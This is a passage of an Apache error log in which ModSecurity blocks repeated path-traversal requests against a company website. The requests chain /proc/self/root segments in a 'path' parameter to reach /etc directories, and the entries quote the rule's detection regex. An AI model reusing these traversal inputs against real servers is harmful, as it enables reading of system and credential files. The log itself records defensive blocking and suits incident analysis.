[Wed Mar 18 08:54:33.057010 2026] [:error] [pid 15051:tid 140411540502272] [client 74.7.243.128:37044] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqSeSmAPhZkrhU8w4lZ_wAAAJg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 08:54:42.485536 2026] [:error] [pid 17887:tid 140411699963648] [client 74.7.243.128:37046] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqSgQkwaGbbGflqUZD9YQAAAMU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 08:54:45.966387 2026] [:error] [pid 26799:tid 140411599251200] [client 74.7.243.128:32964] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqShda6ubjKNq_cu4aFlgAAA1E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:54:56.845953 2026] [mime_magic:error] [pid 15051:tid 140411607643904] (70014)End of file found: [client 57.141.18.18:37624] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 08:55:15.385844 2026] [mime_magic:error] [pid 31803:tid 140411624429312] (70014)End of file found: [client 57.141.18.123:38160] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 08:55:20.420220 2026] [:error] [pid 31803:tid 140411574073088] [client 74.7.241.31:46494] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqSpuyqAr6etmhZHNqq3wAAAFQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:55:30.432357 2026] [:error] [pid 29882:tid 140411632822016] [client 74.7.243.128:32966] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqSskzinOy1jxa1j4cBCgAAAQ0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:55:30.528050 2026] [:error] [pid 19507:tid 140411632822016] [client 74.7.241.31:33246] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqSstY0UrI5A3LftIyPCQAAAY0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 08:55:33.987444 2026] [:error] [pid 17887:tid 140411616036608] [client 74.7.241.31:35776] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqStQkwaGbbGflqUZD9iwAAAM8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:55:37.466495 2026] [:error] [pid 17653:tid 140411725141760] [client 74.7.241.31:35780] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqSucdf6f5d65gmYZTBWQAAAsI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:55:50.641835 2026] [:error] [pid 15051:tid 140411649607424] [client 74.7.241.31:42488] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqSximAPhZkrhU8w4laNgAAAIs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 08:55:51.943783 2026] [:error] [pid 15826:tid 140411683178240] [client 74.7.241.31:34404] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqSx-oXxyEfFpUF8f9bfQAAAUc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:56:24.594118 2026] [:error] [pid 17653:tid 140411616036608] [client 74.7.241.31:34420] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqS6Mdf6f5d65gmYZTBiQAAAs8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 08:56:46.366257 2026] [:error] [pid 17653:tid 140411616036608] [client 74.7.241.31:42328] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqS_sdf6f5d65gmYZTBsAAAAs8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/run/initramfs/state/etc
[Wed Mar 18 08:56:54.943142 2026] [:error] [pid 19507:tid 140411699963648] [client 74.7.243.128:39962] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqTBtY0UrI5A3LftIyPRQAAAYU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:57:27.547752 2026] [:error] [pid 15051:tid 140411574073088] [client 74.7.243.128:58944] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqTJymAPhZkrhU8w4lagAAAAJQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 08:57:30.087127 2026] [:error] [pid 26799:tid 140411582465792] [client 74.7.243.128:42788] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqTKta6ubjKNq_cu4aF4QAAA1M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:57:42.114395 2026] [:error] [pid 17887:tid 140411548894976] [client 74.7.241.31:38590] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqTNQkwaGbbGflqUZD94wAAANc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:57:59.789241 2026] [:error] [pid 26799:tid 140411565680384] [client 74.7.243.128:42788] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqTR9a6ubjKNq_cu4aF_wAAA1U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:58:02.452433 2026] [:error] [pid 30077:tid 140411590858496] [client 74.7.243.128:36938] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqTSvu8EFLIOrSqIpvyoQAAAlI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 08:58:05.857992 2026] [:error] [pid 19507:tid 140411725141760] [client 74.7.241.31:50560] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqTTdY0UrI5A3LftIyPdwAAAYI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 08:58:14.815474 2026] [:error] [pid 31803:tid 140411632822016] [client 74.7.241.31:54268] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqTVuyqAr6etmhZHNqrSwAAAE0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:58:34.197475 2026] [:error] [pid 15051:tid 140411616036608] [client 216.73.216.191:51264] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqTaSmAPhZkrhU8w4laqwAAAI8"]
[Wed Mar 18 08:58:34.202377 2026] [:error] [pid 17653:tid 140411540502272] [client 74.7.241.31:47706] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id 